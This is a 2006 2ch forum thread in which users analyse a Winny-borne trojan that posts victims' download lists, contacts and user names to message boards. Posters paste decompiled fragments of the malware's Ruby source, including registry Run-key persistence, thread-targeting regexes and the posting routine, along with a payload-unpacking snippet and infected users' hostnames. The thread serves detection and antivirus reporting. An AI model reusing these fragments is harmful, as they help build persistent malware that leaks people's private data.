【アンチウイルス検出状況】
 Norton × ・・Torojan.TypeB
 NOD ◎ ・・・・
 ・
 ・
860名無しの報告
垢版 |
2006/03/30(木) 13:35:55ID:PsOFPqjh0
わしもあきらめた。

複数のウィルス(迷惑プログラム含む)の投稿がどんどん混在していく状況では
apache の access_log でも見ないと判別不能だろうね。
名無しに出来る事は少ないよ。あの板にはおそらく妨害者も居るしね。
2006/03/30(木) 14:15:38ID:/NlYXzYhP
>>858,860
>>832
>必要ならキャップも発行してもらえるよーに管理人さんにも
>お願いするつもりでいますー。

って、言っていますしー。
862名無しの報告
垢版 |
2006/03/30(木) 14:26:44ID:d3zttCMS0
マルチポスト失礼(対策スレにも書き込みました)

★ウイルス名
Trojan.Kakkeys.Dだと思う。発見日も米国時間で2006年3月23日だからまず間違いない。
http://www.symantec.co.jp/region/jp/avcenter/venc/data/jp-trojan.kakkeys.d.html

★通称: 未定(以下候補)
・徹也ウイルス ←投稿された内容
・スッポンウイルス ←一度くっつくと離れないから
・レイニー・ウイルス ←reとnyに雨のように降り注ぐので
・埋めルス       ←どんどん埋め立てていくから
・アーシェスHiguchi ←レスの内容?
・腐海         ←腐海のようにどんどんスレを飲み込んでいくから

★症状(概要)
・2ちゃんねるダウンロード板に
イ)Winnyがインストールされているフォルダ内の、Tab1.txt、Tab2.txt、download.txtの内容
ロ)アドレス帳に登録されたアドレス、メッセンジャーに登録されたアドレス
ハ)PCに登録されたユーザー名
を書き込む

★症状(詳細)
A)スレを上げて書き込む
・スレタイに「Winny」を含む、一番古いスレ(dat番号が一番若い)
・スレタイに「Share」を含む、〃
・スレタイに四桁の算用数字を含む、〃

の条件を満たすスレに並行してレスを送る。内容は、イ)、ハ)

B)スレを下げて書き込む
・スレタイに「winny」を含む、一番古いスレ(dat番号が一番若い)
・スレタイに「share」を含む、〃
・スレタイに四桁の算用数字を含む、〃

の条件を満たすスレに並行してレスを送る。内容は、イ)、ハ)

C)fusianaして書き込む
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/l50

に対してレスを送る。内容は、ロ)

頻度は、A) >> B) >> C)

★ウイルスの実体
・Share、Winny共に使用してないので分かりません。候補はいくつか上がってるようですが。

★各社の対応状況
・実体を特定してないので不明。ageが現れたのはsageが来たあとなので亜種の可能性もあり
863名無しの報告
垢版 |
2006/03/30(木) 14:29:23ID:9+iJX9530
お忙しいところ申し訳ありませんー
昨日より同人板にもダウン板と近似タイプのage爆撃が発生している模様です
感染者のSearch.txtかDownload.txtの中身を投下

管理人が閲覧者に質問するスレ
http://comic6.2ch.net/test/read.cgi/doujin/1143633663/
【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/

一覧の上にあるスレが爆撃受けてるかもです。
2006/03/30(木) 14:29:25ID:d3zttCMS0
補足
・ageは大文字小文字関係なく書き込むか否かは不明
・「ny」や「re」だけではスルーしました。
・ユーザー側での対策法はありません。攻撃を事前に予測することは可能ですが
・subject.txtで1000を超えたことを判定しているようです。
   空爆されたスレがsubject.txt上で999で止まったときに(実際には1000になった)、
   dat落ちするまで次の攻撃対処に移動しなかったので間違いないです。
2006/03/30(木) 14:32:16ID:d3zttCMS0
>>863
作者が調子に乗ってキーワード変えて他スレを爆撃し始めたのか、
ソースが流れてて誰かが改造して流したのか

人のいるところならいいが、過疎狙われるとヤバイ
866名無しの報告
垢版 |
2006/03/30(木) 15:05:20ID:d3zttCMS0
>>863
一番新しいスレと一番古いスレを攻撃してるっぽい
キーワードは「同人」と「スレ」が臭い。

板に糞スレ立てましたスマソ。
スレ 同人 スレ 同人 スレ 同人
http://comic6.2ch.net/test/read.cgi/doujin/1143698200/l50
2006/03/30(木) 15:06:11ID:GZiWxEj90
投稿毎に番号入力を強制するようにはできないの?
多少面倒でも爆撃で埋められるよりはマシじゃん
2006/03/30(木) 15:08:12ID:1fFYlHSU0
今日は・・・
ID:UHc3otES0 205 res
2006/03/30 00:00:17 【album】【hiphop】 Nujabes - Metaphorical music.zip,,0,0,a12a1d14297d6b068c294782d07bbf28,1
2006/03/30 00:02:53 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 00:08:46 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
2006/03/30 00:12:05 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 00:18:39 【HIPHOP】【シングル】【洋楽】REMIX---R&B.Hip-Hop Mix 2 - (Ja Rule Shaggy Destiny's Child Mya Next Ruff Endz Pink Jay-Z).mp3.lzh,,0,0,e11d113fa2a5d648d6544c12b2056608,1
ID:tCUSJrP30 472 res
2006/03/30 05:39:42 【HIPHOP】【シングル】【洋楽】HipHop Mix - Shyne Cam`Ron Eminem Aaliyah Timbaland Big Pun 504 Boys Bone Thugs Lil` Zane 112 Mya D-12 Jay -z 2 PAC NAS.mp3.mp3.mp3.mp3,,0,0,df1cf121662440442e4e89907377c3ac,1
2006/03/30 05:43:38 【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
2006/03/30 05:44:17 【HIPHOP】【シングル】【洋楽】eminem redman snoop dogg pharoahe monch krayzie bone dmx eve b.g. jurrassic 5 2pac bizzy bone method man big punisher jadakiss krs-one - hip hop mix 1(1)(1)(4).mp3,,0,0,68c276011bc9c51b389261d37c97c03b,1
2006/03/30 05:50:06 【HIPHOP】【シングル】【洋楽】Eminem with DMX Xzibit Ja Rule & 2Pac - Bitch Please III.lzh,,0,0,38c1900d951207a64f1de458bd4ffb05,1
2006/03/30(木) 15:09:54ID:Nfp4/dY10
>>867
フリーメールの垢取得のときみたいにって事?
数値を画像で表示させるから、専用ブラウザは対応が必要になりますね
NGNG
>>867
http://qb5.2ch.net/test/read.cgi/operate/1062269604/632

>>869
なので不可能ではないと思います。
2006/03/30(木) 15:31:52ID:1fFYlHSU0
対策方法

・Rock + バーボン
・特定のIDを狙いうち
2006/03/30(木) 15:33:14ID:GZiWxEj90
>>869
そうそう、あんな感じで
全板空爆されたら、そんな方法しかなさそうだし

>>870
やれそうならやってほしいっすね
せめてスマンテックが対応するまでだけでもいいから
NGNG
>>871
プロバイダへの通報も・・・(まぁ、相手がいることですし。。。数も多いし。。。

>>872
メンテを含め、鯖に負担が掛かるでしょうね。
導入しても即ウイルス作者が対応するでしょうけど。。。


傘スレが機能不全になってからBooできなくなっちゃったぁ。
sage対象までは追いきれないぽ。。。
2006/03/30(木) 15:42:30ID:???0
>>862
かなりイメージに近いですー。
それをパターン別に分類していけばいーかなーと。
そしてパターン別に対応状況確認ってことでー。

すでにもう見られなくなってるパターンもあると思うんですよねー。
そういうのを時系列で整理も必要かなーと。

とりあえずは現時点で書き込んでるのを整理してから、
必要に応じて過去に遡る感じでー。

>>871
ランダムすぎるのでRockは無理ですー。

>>872
>せめてスマンテックが対応するまでだけでもいいから

ウイルス本体さえ送れば、アンチウイルス会社はそこそこ
迅速に対応してくれてるようですー。

だから探したものを迅速に、漏れなく送る必要があるなーと。
875名無しの報告
垢版 |
2006/03/30(木) 15:45:00ID:d3zttCMS0
【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50

ここのスレ、k9Tzvsz7が昨日の深夜、WRuVwZkFが朝から一人で攻撃していますね。
同一人物だとすると、他の攻撃スレには何人かいるので、何種類かの亜種がいる可能性大。
NGNG
>>874
勇気スレチェックしているようにしてますが
ロダではそれらしいのはまだ出てないようです。
2006/03/30(木) 15:47:25ID:1fFYlHSU0
>>874
今のRockには期待してない


新・Rockは1回でも書き込もうとするとバーボン逝き (Rock登録の時に最低**文字以上は必要)
878名無しの報告
垢版 |
2006/03/30(木) 15:56:18ID:d3zttCMS0
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/292-

hbs80006.hbs.ne.jpがしつこく書き込んでる。
症状が今回のウイルスなので、焼いてください。
2006/03/30(木) 16:04:00ID:1fFYlHSU0
いきなり手に入った
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27

require 'zlib'
def self_destructive board
#爆撃終了
board.settings['BBS_TITLE'] == 'この板は腐ってる@2ch掲示板'
end
(省略)

load_exec 'AntiDojin.rb.zz'

あふぉかと・・・
2006/03/30(木) 16:06:32ID:d3zttCMS0
>>879
挙動の解析はできる?
2006/03/30(木) 16:19:06ID:1fFYlHSU0
zlib使ったこと無いし
perlからzlibの使い方も知らぬ

(中にある)ファイルの日付は昨日(03/29)と今日(03/30 8:50)だった


少し追加
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip PoITQxGbsQ 6,502,611 293941e450b10a74f4c3953789ed7077
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip k7t40jJlVq 6,830,256 859c1152ae891af6e45d39facb690d27
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip TrahIRSX7w 5,921,635 aa79d0cf8c6fcd857b890ca6ac4498cc
(一般コミック・雑誌) [ジャンプ] [2006-18] BLEACH 221.zip kTrEVbYUbc 6,502,611 8a31ae38742cea2d46eb2bb054d3964c
(一般コミック・雑誌) [ジャンプ] [2006-18] テニスの王子様 Genius307.zip k7t40jJlVq 3,069,394 384fa751e8af899e950056e088899f05

以前にも見たような感じでファイルが・・・
2006/03/30(木) 16:41:33ID:???0
>>879
これは送りましたかー?

なんせwinnyが出来ないとファイルも取得できないんですよねー。
そこがネックだったりしますー(うちのプロバイダはwinny遮断してるんでー)。
2006/03/30(木) 16:47:03ID:1fFYlHSU0
http://www.google.com/search?num=10&hl=ja&c2coff=1&q=bbs-menu-for-2ch+%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%E9%80%9F%E5%A0%B1&lr=lang_ja
で検索

<A HREF=http:\/\/([!-~]+)\.2ch\.net\/([!-~]+)\/>#{bbsname}<\/A>
にマッチしたやつを取得

['download.txt', 'tab1.txt', 'tab2.txt'].each{|x|
これは・・・

def startup filename
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
key.write_s('AntiDojin Extended by ', filename)
}
end
む。

↓続く
2006/03/30(木) 16:51:01ID:yKCndGKs0
コミック系・mp3・ゲームやエロゲーのNoDVDパッチとかで
毎週亜種が増えていく予感
このウイルス作者はダウソ(同人も?)に恨みでもあるのかな?

爆撃のあった板に2get禁止のアレでウイルス対策ソフト使いましょうみたいな
宣伝したほうがいいんじゃないかな
それと2chのトップにウイルス対策ソフトを使えと書く (専ブラ使ってない人向けに)
ウイルス感染者が全員2ch見てる訳ではないと思うけど何もしないよりはいいかと
焼け石に水かもしれませんが・・・
2006/03/30(木) 16:52:42ID:1fFYlHSU0
winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)

share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)

rusu_thre = board.include_title(/ういるす|うぃるす/i)

$exename = 'c:\\:滝川クリトリスv3.exe'
$dataname = 'c:\\:滝川クリトリスv3.dat'
!!

if Time.now.to_i < 1143129600
爆撃の時間指定?
board = TwoChannel::Board.new('comic6', 'doujin')

SymantecAntiVirus 2006/03/27のやつで反応無しっと
2006/03/30(木) 16:56:23ID:1fFYlHSU0
ぺたぺた
use Compress::Zlib;

$ZoneProcessfile = "e2.bin"; #(該当部分を抜き出しておくこと)
($ZoneProcesssize) = (stat($ZoneProcessfile))[7];
open INFILE,$ZoneProcessfile;
binmode(INFILE);
read(INFILE,$ZoneProcessbindata,$ZoneProcesssize);
close INFILE;

$dest = uncompress($ZoneProcessbindata);
open OFILE,">ruby.rb";
print OFILE $dest;
close

何かの流用とか言うな

まとめ
昨日から同人板へ爆撃が始まったやつっぽい
2006/03/30(木) 17:01:55ID:1fFYlHSU0
アンチウィルス通報部隊へ
http://kasamatusan.sakura.ne.jp/ → なな → nana11600.zip

受信 : angel
解凍 : rovirus
888名無しの報告
垢版 |
2006/03/30(木) 17:02:23ID:d3zttCMS0
>>885
1143129600 = 2006/03/24(Fri) 01:00:00 JST
2006/03/30(木) 17:02:30ID:???0
>>884
その理屈で言うならですねー、ウイルスソフトは結構もう
普及してると思うんですー。

けど、パターンファイルに登録されない限り検出されないんですねー。
だから広がっちゃってるってのが事実だと思うんですー。

検出されるよーにするには、ウイルス本体を送って対応してもらう
必要があるわけですー。

パターンファイルの更新はー、早いところだと毎日やってますからー、
発見したら1日でも早く送るってのが次善の策だと思うんですー。
2006/03/30(木) 17:21:26ID:1fFYlHSU0
***** 31ruby.rb
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼|/i)
774: if share_thre.empty?
***** 33RUBY.RB
772: end
773: share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
774: if share_thre.empty?
*****
***** 33ruby.rb
852: begin
853: TwoChannel::set_user_agent
854: board = TwoChannel::Board.new('comic6', 'doujin')
***** 34RUBY.RB
852: begin
853: TwoChannel::set_user_agentdownloa
854: board = TwoChannel::Board.new('comic6', 'doujin')
*****
なんというか
バグ入りで(略
891名無しの報告
垢版 |
2006/03/30(木) 17:27:28ID:d3zttCMS0
同人に「ういるす」は立ってないな。いまのところ

試しに立ててみる?たぶん
>>862のロの投稿が始まると思うが

焼くことは可能になるけど、暴露されてしまうという諸刃の刃
2006/03/30(木) 17:33:40ID:d3zttCMS0
ビンゴっぽいね
【結局】着回しを真剣に考えるスレ【金無いんだよ】
http://comic6.2ch.net/test/read.cgi/doujin/1036395101/l50

【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50


/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/
この正規表現がいまいち良く分からない。見た目と違ったマッチになるけど間違った記述なのかな?
893名無しの報告
垢版 |
2006/03/30(木) 17:46:12ID:d3zttCMS0
・・・・上で貼られたウイルスの感染者はID:WRuVwZkFしかいない気がする。
【兄者】さすがだよな俺ら・同人版【弟】
http://comic6.2ch.net/test/read.cgi/doujin/1036419858/l50


【ステル鞠ア】朝倉/芹野パクリ検証スレ【パクラ小麦】
http://comic6.2ch.net/test/read.cgi/doujin/1108821254/l50

ここにもID:WRuVwZkFがいるが、複数感染してる可能性がある。
2006/03/30(木) 17:51:09ID:???P
>>831の続きですー(comic6も追加)
3/29 12:58:11〜3/30 17:27:15(tmp6)
           〜3/30 17:28:07(comic6)
-tmp6-
221-186-221-200.ip1.george24.com 213件
p36003-adsao12honb4-acca.tokyo.ocn.ne.jp 105件
p51044-adsao12honb4-acca.tokyo.ocn.ne.jp 78件
phoenix.aitai.ne.jp 21件
softbank219062040169.bbtec.net 12件
softbank219052178096.bbtec.net 11件
dhcp-ubr1-0427.csf.ne.jp 11件
cable153064.ont.ne.jp 6件
nissin45079.ccnw.ne.jp 5件
N029029.ppp.dion.ne.jp 3件
135.169.hinocatv.ne.jp 2件

-comic6-
blackcat.reslife.okstate.edu 20件
p927305.aicint01.ap.so-net.ne.jp 15件
nissin45079.ccnw.ne.jp 3件
2006/03/30(木) 17:56:34ID:3SBpntzK0
このような意見がありますが
http://tmp6.2ch.net/test/read.cgi/download/1143616483/236
2006/03/30(木) 18:17:58ID:???0
>>895
どーゆースレタイのスレを立てればいーか整理してー、
理由も添えて、ここに申し込んでみてくださいー。

【実験】書き込めなスレッド スレッド924について2
http://qb5.2ch.net/test/read.cgi/operate/1075184383/
2006/03/30(木) 18:25:26ID:1fFYlHSU0
>>894
ISPの共有ホスト (多数)
phoenix.aitai.ne.jp 21件

マンションの共有ホスト (数人)
221-186-221-200.ip1.george24.com 213件
2006/03/30(木) 19:20:41ID:1fFYlHSU0
def main_write board, messe #ぎりぎりか?
nanasi_name = board.settings['BBS_NONAME_NAME'] == '' ? '[名無し]さん(bin+cue).rar' : board.settings['BBS_NONAME_NAME']
name_max = board.settings['BBS_NAME_COUNT'].to_i
nanasi_name = nanasi_name[0, name_max]
targets = []
winny_thre = board.include_title(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)
if winny_thre.empty?
targets << board.max_res
else
targets << winny_thre.min{|a, b| a.key - b.key}
end
share_thre = board.include_title(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)
if share_thre.empty?
targets << board.oldest
else
targets << share_thre.min{|a, b| a.key - b.key}
end
rusu_thre = board.include_title(/ういるす|うぃるす/i)
if rusu_thre.empty?
#targets << board.first
else
targets << share_thre.min{|a, b| a.key - b.key}
end
targets.unshift(*(board.sort_old[-2, 2]))
targets.each{|x|
unless x.write(nanasi_name, '', messe.rnd)
x.board.tmp_wait
end
}
end
2006/03/30(木) 19:56:06ID:???0
>>894 見てきますー。
2006/03/30(木) 20:04:46ID:???0
>>894 下記以外を焼きました。

共用
> phoenix.aitai.ne.jp
> 221-186-221-200.ip1.george24.com
2006/03/30(木) 20:25:44ID:d3zttCMS0
>>898
定義の部分がないから妄想で

winny_threに(/と[^暴]{0,2}れ|ぱ.{0,2}く|ny|不正|盗|まね|真似/i)とマッチするスレを入れる。
もし、winny_threが空っぽなら
条件を満たすものの中からmax_res(dat番号が一番大きい場所?)を狙う
否なら
キーワードを満たす一番古いスレを狙う
share_threに(/[痛晒厨嫌捏欺儲]|いたい|さら|ちゅう|きら|ねつ|さぎ|日西|豆寸|女兼/i)とマッチするスレを入れる。
もし、share_threが空っぽなら
一番古いスレを狙う
否なら
キーワードを満たす一番古いスレを狙う
rusu_threに(/ういるす|うぃるす/i)とマッチするスレを入れる
もし、rusu_threが空ならば
コメントアウトしてるのでなし
否ならば
条件を満たすものの中で最古のものを狙う

-----
ただ、マッチングにバグがあるみたいだからほぼ無差別に最新2スレを狙ってるみたい。
902名無しの報告
垢版 |
2006/03/30(木) 20:41:04ID:d3zttCMS0
>>900
fusianaしなかった串ではないやつも焼けるんですか?

同人のほうは止まったようです。
2006/03/30(木) 20:42:59ID:yZD8gakK0
>>885
> $exename = 'c:\\:滝川クリトリスv3.exe'
> $dataname = 'c:\\:滝川クリトリスv3.dat'

このv3ってなに?
アンラボのV3 ウイルスブロック v3antinny.exeに対抗してるの?
アンラボの販促とか?
レス数が900を超えています。1000を超えると表示できなくなるよ。
5ちゃんねるの広告が気に入らない場合は、こちらをクリックしてください。